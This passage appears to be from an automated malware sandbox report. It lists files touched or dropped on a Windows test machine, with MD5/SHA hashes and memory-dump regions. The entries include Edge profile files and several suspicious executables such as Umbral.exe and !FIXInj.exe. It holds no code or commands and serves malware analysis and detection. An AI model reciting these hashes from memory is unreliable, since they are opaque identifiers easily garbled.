| SHA512 | 7365fa7d1e71bedf8c5ef729d3daa6cc6b043b755f156c3e2aadb1947a0c58079bae31d61cf4e32fd70726cad1a2b456a39491dfc045f311242869964ed3e709 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b9a409eb54b5d4a28bb5dd237d37cfd7 |
| SHA1 | 9859911ac8642ddf18e681d5f5228fb91a98912b |
| SHA256 | c91c392a06ead881a96e607728d25c33704365d2481c0eb66750ef57896850a0 |
| SHA512 | 419181bf50bb201c038fa3a99e643e6a7be1757abc6aa956757fb65406f0818b24ce10b223bed8e53af3218eee6b015711170d704364b43bae013fd2a4255916 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 98afec5c3738dfa0f8f0712dd55eea14 |
| SHA1 | 6137b42b941ab19ef03023a2856a1146b9a61ca8 |
| SHA256 | fdecfb79297f5f3c495824fac61a09e39e550f8b86a50c256b5d924c1a04634d |
| SHA512 | 26506c72a58d84e88bd2c52918c5fea1f143583bde1f03ad231055a38574478c943285bc7d30189a904513ccf409bd7043078f772a2c30b4137a1356c4c27cf8 |
memory/1744-1229-0x000001A6467A0000-0x000001A6477A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2333e4cf4eed0360e1e4892447a9c7bd |
| SHA1 | d4b2a4ec0281c9b78a209dbadfd5b516d0427a2c |
| SHA256 | 1ec3a78976d56ee79862b03c14437f0acb0e956974bf03ce6ea36279126f94dc |
| SHA512 | 06e389354e7a3e8d24a8d400c2508b38433d2ddde2345cfa905ff669070d594ed6c94fecab17d844f2eeade42403b9d307b37b0668d9025e2ceaa3269b3812e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 270d6f0e87b73d1090e1f7e5151f12ee |
| SHA1 | 5f33a31c2a9b21ad3abeba759d77671c7f8d3081 |
| SHA256 | 1ac60b7e9b32e85e51d477f26a328ed6d997a44cb86f05010398c2f03de5d90f |
| SHA512 | 6ca8b8f09743784cb33203a51b5c786bf3ca772992c9aca1add3084423f2021c9fa33f10adc62fbfde39dcb48d1dbd7aa1acd8a761ec6365fc3da467594ec966 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c22b8fdb9d69a17c492f51d4822f3b67 |
| SHA1 | d6f33387d754ff4f974c8d6b1a033844c5a1f4da |
| SHA256 | 7eb24fe024a49849f5e4550c6e74ba681cce730c19c3146160f54e1c5ded3a5d |
| SHA512 | 22201d74d5b1fe54eb4218f08cad21d277ad67ffe8f4ee13f840156fb93ca40b1d7065d4ce6b1a8a7e6f47845537517eb753011e957013fc57517bd04564dc80 |
memory/3628-3308-0x0000000005D30000-0x0000000005DC2000-memory.dmp
memory/3628-3313-0x0000000005E30000-0x0000000005E3A000-memory.dmp
memory/3628-3374-0x000000000BCC0000-0x000000000C3A0000-memory.dmp
memory/5736-3412-0x0000000000D70000-0x0000000002397000-memory.dmp
C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe
| MD5 | 6bb0ab3bcd076a01605f291b23ac11ba |
| SHA1 | c486e244a5458cb759b35c12b342a33230b19cdf |
| SHA256 | 959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908 |
| SHA512 | d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621 |
memory/5736-3466-0x0000000000D70000-0x0000000002397000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 38dc18b20cb8e19ff84b8437eb259e18 |
| SHA1 | 3ffe09cffac3b9d35cc6d4dc6910b0a91dea1f4e |
| SHA256 | cf1987132e6abec1d4b5c662070217ef14ae1008fa69dcb274c1abfb2bf0cce8 |
| SHA512 | bca30f4fd17e4b6ddbe7644ca59422643cf87695402e04c7f07d85ee5632fa20d5c0660ba6af309ca9033c4855ad13a8d6305a11eb1e25d93cc9b9dbdad75456 |
memory/5720-3481-0x00000000000D0000-0x00000000003F4000-memory.dmp
memory/6424-3483-0x0000000002480000-0x00000000024A4000-memory.dmp
memory/6424-3482-0x00000000002E0000-0x000000000036A000-memory.dmp
memory/6596-3492-0x000000001C410000-0x000000001C460000-memory.dmp
memory/6596-3493-0x000000001C520000-0x000000001C5D2000-memory.dmp
memory/6924-3509-0x0000016F9FBF0000-0x0000016F9FC12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4k4e4yv0.jls.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 3a1707a75029a7d714539d6d57db7fe3 |
| SHA1 | 0b6db8bdb9d7999473ffe9f2b694bf32e47aeaa3 |
| SHA256 | abb28f7e97d903c18fb6b5522a57dcc4a3fb8d4c3d568dd747706c7dd3bc5a00 |
| SHA512 | 09cbb5e3e4fb82b61c2d153403e8c209b7f109f19fbbcaafb1bb592924333b5dcba4db393f3c996a78136fe31d66f139b77e9ea32d624890aae6f55cf8bc3073 |
memory/6924-3578-0x0000016F9FF20000-0x0000016F9FF2C000-memory.dmp
memory/6924-3579-0x0000016F9FF50000-0x0000016F9FFAC000-memory.dmp
memory/6700-3581-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\Pictures\l6lGezRTHj8HnL5T9Jiqd1RF.exe
| MD5 | 588ec1603a527f59a9ecef1204568bf8 |
| SHA1 | 5e81d422cda0defb546bbbdaef8751c767df0f29 |
| SHA256 | ba7bda2de36c9cab1835b62886b6df5ecbd930c653fac078246ce14c2c1c9b16 |
| SHA512 | 969baab4b3828c000e2291c5ebe718a8fc43b6ce118ccc743766162c3a623f9e32a66fb963672b73a7386d0881340ba247f0aef0046cacbe56a7926900c77821 |
memory/2216-3604-0x0000000000400000-0x000000000083E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
| MD5 | 06f13f50c4580846567a644eb03a11f2 |
| SHA1 | 39ee712b6dfc5a29a9c641d92c7467a2c4445984 |
| SHA256 | 0636e8f9816b17d7cff26ef5d280ce1c1aae992cda8165c6f4574029258a08a9 |
| SHA512 | f5166a295bb0960e59c176eefa89c341563fdf0eec23a45576e0ee5bf7e8271cc35eb9dd56b11d9c0bbe789f2eac112643108c46be3341fa332cfcf39b4a90b9 |
memory/4092-3619-0x0000000000010000-0x000000000005A000-memory.dmp
memory/1612-3632-0x0000000000BA0000-0x0000000000BAA000-memory.dmp
memory/1612-3641-0x0000000002DD0000-0x0000000002DDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
| MD5 | 9694195bfd2d5a2d219c548d8dc65cf0 |
| SHA1 | d1113d97bb1114025e9260e898f3a3048a5a6fda |
| SHA256 | c58b3fa42e404b4a095ee2959a7975b392d7d6b6af6e4d11c1431e3a430dfb6e |
| SHA512 | 24bb0f6432b221fe621d81a1c730bd473e9c295aa66a2b50cbe670ad2260f942a915f7f9aef65e6dc28320b8208fc712d9bfdc43dbc1a607ed9393bb5c17051a |
memory/6872-3645-0x00000210F5B00000-0x00000210F5B40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
| MD5 | ad8378c96a922dcfe813935d1eec9ae4 |
| SHA1 | 0e7ee31880298190258f5282f6cc2797fccdc134 |
| SHA256 | 9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98 |
| SHA512 | d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f |
memory/2216-3689-0x0000000000400000-0x000000000083E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | de94da9f218e18936aee6923c483ec3c |
| SHA1 | d318589bd595e7a1b6a8106e88f62ac2dc6870bc |
| SHA256 | 2abf7d7032d6d940ed1cdd0a2b312b4fd0a5f1e2c5181174c3f8df21605e0671 |
| SHA512 | ccc2fa1abd53384e0888077f4eec4539bd27bb179244d6e033b4857c30fa61a598776352970f00dd06d64fbf8b9e3823341abdb0cda6f4de7b4281a474c5f238 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8cb9cdb1a0aec7a26ee723b6c3174342 |
| SHA1 | 353507cb03e4491ad8c2dce16e4cd65bbcb6097c |
| SHA256 | 6151c8640f23b0b66c005a179cfbd983a1db47e9f6b025b589695223d4a37e6f |
| SHA512 | 7d7db664ac2e858465be26d9d50d9f986073777d75a5b42def466dcfcf55ec75d885f2576347e2c0d5621924867d3f648e4c11086efb2a4d41d239793dca09f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 94185dcdbe0dcb09cbd067f6b8354797 |
| SHA1 | d79a8feb340e5f88c1a7af2c2132dfc8b38e64b4 |
| SHA256 | 748216e0f767f83c80798867c992d755e68424d75ec66dcd9a56cab8bce410ca |
| SHA512 | f43bcd527909a78d75bd95000862d30775dcde3820c137fdaf58ecd39238ff33aac05575e999a3b4727ec7dcd33596d343c7bf749779a791238d38c0d4b3bbd0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | fc515bfc60adba798695e516dbf80ef1 |
| SHA1 | 6dc4722092af19a95e4d5a7b64dca9afc2ad30ad |
| SHA256 | 869b6e72ce52552fd50b7144ae06a81c389273f76f92cd08c1475514f516433d |
| SHA512 | 588d583a1ed21f03be83ca339eafa4339aca22b0c3bfe0ad9fbe44bec6ae20c0e82210f07476926ae29cfb24ad7ca482e9e7282a99c67efe80dc7bd0762abdc4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 012c8fb85ef425d969add6fe54956ee1 |
| SHA1 | bf8c6c22bb5cea896677e2a6122b23c7621a8b40 |
| SHA256 | e700633039dbf7ced1b0e9d5aac030326597c46185589b1fd7108c851dd4f3e6 |
| SHA512 | 3331f6ca572e2439398070ddc26498aeb00c282d29ee584db0659ab4c482965e2d07ab5fcd2f9228bcc58f0bbce2ee70d3a36a3002cf70fde6c010af4a0b14a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b880b2918099acb956d03f5639082e85 |
| SHA1 | 8bd0d345a73f3a8ba6cc581213fff13dad197e14 |
| SHA256 | da6abdb948d5fabd29a6322ba79e37dc0f720b4a7794cc0c86b05db20d236108 |
| SHA512 | cb7548b4d717c77b68e71bd393dc8a16d6f362cabb3e5c48cae88987dc681e555a2703e6c02f313b33dc61256d28d71cb4af4ca8c85fd2baa14e5dc6f6eab28f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 452c0a6a8d36fcf032ac9cd058742275 |
| SHA1 | b301b125f82b3089b6daa9b8fc44356cc4ca582f |
| SHA256 | 154355b51edc5b84a9868120520494759e10b3831dec20235f541829d89dac4c |
| SHA512 | 6bc02baf11af203867a590ec47ea02c4ef787648229ec80305f605bf29b65e33e6672b8d1c7b025049231a1ddd8353ba6ad22b9ddebed3b99d081ccc5ae0d89a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 45607a0ea7364556bb3b7a9ab8818f25 |
| SHA1 | 74b42a95efedfdf83dced49d9f8a786a2585efc3 |
| SHA256 | 49bc7778e156d634b4ff2b6e95bcd03942e565645a39e5d2736be7b453b95daa |
| SHA512 | 6b76cbb6ac171e99e8e5b8a15c4cc7aa9c22a517c2e7e459e25614b9f0401dd952a235b6006131273908743717466c1b29740d3f10e52be98677e1fbf8410c53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 311cf6edb71cc2358054f0d3497e99ad |
| SHA1 | 29c385e7be7b73221b1326b5fc37df298869bd8c |
| SHA256 | a3865ec0575be3883a1cea9d041ccb78fe7cccc9cae2711f2016a438030cf50f |
| SHA512 | fa5ef698d1b3eee17c74ce7f00ad90f36ea50362e40926c6c4f6ca1719585cd6d77bbe5347f1f47150b3c8ee4348f9711cf52cc54337ea534a4df016331629a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4ad0590f28cead0eec1a579bb9bfae93 |
| SHA1 | a567c1bc58e9c81a1715afe776acb6b366659b96 |
| SHA256 | 27d39d9553a2693f8c96a03fb446b22dcf527df7abf518548aff36258caf0f06 |
| SHA512 | e03b9e7e4b74337370b2f90d75d6e31bbc01c88d7e9cf92fab042c8add66c0b63f2a613f67f37e044ecbb521785e3fe30814b6e2264d93caa397744b6fcc4f14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7a0353f32b160563acb1180333297dbb |
| SHA1 | ebd3e70cadd0cfff78db79e047ff33b9a69662f3 |
| SHA256 | e5771b33d3f3c49cde150d20722dfba1a16217279ad37a60517afd0a0d19f2bd |
| SHA512 | 41fabcd74409152f5b7a0f8c738a23596cac5022cc3773dc2955e8e7f316c6df1b7b221d630bd72f69c594dd911646a727948cf2d01a6e08e3166d4d3a61f683 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2a444e363dbc5abd014873bdd56ee4d6 |
| SHA1 | fd8535d3abdc749ece96eb41e61cfea09492ec5b |
| SHA256 | dbca54d8fd7e8536c51e292d0c5c86f229e5a79dd2d32c3ae75b2ffc009d4eec |
| SHA512 | 268f658b91eddc998d4b3b3ae204d9ae34bd115f441569cc510f1ff09f81acb2da4c57f9de9f85168da053fa76abef31cbcb27479e9c141290ed933715ed4d90 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | bc6b17810062a00aa5423831f7c2d5e7 |
| SHA1 | dd1a19da6d3fae5b2f33f80ce2ed933c593faa0f |
| SHA256 | b2a10d0a0f95fc126c42bb4b4627283934d3e8b37eb8746e72d3f2e5d695e0dd |
| SHA512 | ba51faeab4bb0fb6f02e3cfdeb72683066fe1262e89f4b79e895ee78c8642c8f4cd774990f4b147f4dd1b71b9fa1db5cbcb9c4271df1f81bfac64029e4756b47 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 420aeac16f39ea0f50bb4fedffdc8bdd |
| SHA1 | d703375e127c02bb57ea5c73758e53b440eff01c |
| SHA256 | 19c4aa5823cdb68cc8f63208f0e03ade76078b6738c14e0aaa265428526699f7 |
| SHA512 | 6971925b03831118e889304e200e74090f4108040efe9d594a2bdb6c50a34413cb233110ae1a6c316191aa0fc8c9102ab6aba879fb6ccd7cf75594c571cad52e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | dce17b09e6e3fe92e5a1f753e57a4fbe |
| SHA1 | 77777e206f6aca53962ab094d0f724a0901d1fd6 |
| SHA256 | 42edd602da277c06b7e40e235b45e0db988812c2be86f18f58a7f3d9dae698b0 |
| SHA512 | 43723f058eb2b7b8cffff1b613b185bacee93d1936fb034613d2e15be598d1058d6ba8469fc5c7ec52b846586c69b51317c6916b468709935b08286422e6d08b |